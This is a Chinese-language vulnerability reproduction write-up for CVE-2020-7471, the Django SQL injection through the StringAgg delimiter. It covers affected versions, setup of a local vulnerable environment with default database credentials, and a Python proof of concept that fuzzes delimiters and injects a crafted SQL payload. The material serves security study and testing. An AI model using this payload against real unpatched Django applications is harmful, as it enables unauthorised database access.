002-CVE-2020-7471 Django sql注入漏洞.md
3.67 KB / 2021-07-17 00:01:30
# CVE-2020-7471 Django sql注入漏洞
### 一、漏洞简介
Django是高水准的由Python编程语言驱动的一个开源Web应用程序框架,起源于开源社区。使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序,应用广泛。2020年2月初,Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞(CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义并注入恶意SQL语句
### 二、漏洞影响
Django 1.11.x < 1.11.28
Django 2.2.x < 2.2.10
Django 3.0.x < 3.0.3
Django 主开发分支
### 三、复现过程
环境安装
安装 django 漏洞版本,我测试用的是
```bash
pip install django==3.0.2 -i https://pypi.tuna.tsinghua.edu.cn/simple
```
参考 https://www.runoob.com/postgresql/windows-install-postgresql.html 完成 postgres 数据库的安装
新建数据库
```sql
CREATE DATABASE test;
```
修改 sqlvul_projects/settings.py 里面的数据库配置,如果上一步你安装用的默认配置(包括设置密码为postgres),就无需修改任何配置,可以跳过这一步
```sql
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'test', # 数据库名称
'USER': 'postgres',
'PASSWORD': 'postgres', # 数据库用户密码
'HOST': '127.0.0.1', # 数据库地址
'PORT': '5432',
}
}
```
通过 django 初始化数据表
```bash
python3 manage.py migrate
python3 manage.py makemigrations vul_app
python3 manage.py migrate vul_app
```
**poc**
```python
# encoding:utf-8
import os
import django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sqlvul_project.settings")
# Django 版本大于等于1.7的时候,需要加上下面两句
if django.VERSION >= (1, 7):#自动判断版本
django.setup()
from vul_app.models import Info
from django.contrib.postgres.aggregates import StringAgg
from django.db.models import Count
"""
postgres 预先执行的SQL
CREATE DATABASE test;
\c test;
\d 列出当前数据库的所有表格
"""
def initdb():
data = [('li','male'),('zhao','male'),('zhang','female')]
for name,gender in data:
Info.objects.get_or_create(name=name,gender=gender)
def query():
# FUZZ delimiter
error_c = []
other_error_c = []
for c in "!@#$%^&*()_+=-|\\\"':;?/>.<,{}[]":
results = Info.objects.all().values('gender').annotate(mydefinedname=StringAgg('name',delimiter=c))
try:
for e in results:
pass
except IndexError:
error_c.append(c)
except:
other_error_c.append(c)
print(error_c)
print(other_error_c)
def query_with_evil():
'''
注入点证明
分别设置delimiter为 单引号 二个单引号 二个双引号
尝试注释后面的内容 ')--
:return:
'''
print("[+]正常的输出:")
payload = '-'
results = Info.objects.all().values('gender').annotate(mydefinedname=StringAgg('name', delimiter=payload))
for e in results:
print(e)
print("[+]注入后的的输出:")
payload = '-\') AS "mydefinedname" FROM "vul_app_info" GROUP BY "vul_app_info"."gender" LIMIT 1 OFFSET 1 -- '
results = Info.objects.all().values('gender').annotate(mydefinedname=StringAgg('name', delimiter=payload))
for e in results:
print(e)
if __name__ == '__main__':
print(django.VERSION) # 测试版本 3.0.2
initdb()
query()
query_with_evil()
```
然后运行 POC 脚本CVE-2020-7471.py就可以了
漏洞环境及其poc下载地址:https://github.com/ianxtianxt/CVE-2020-7471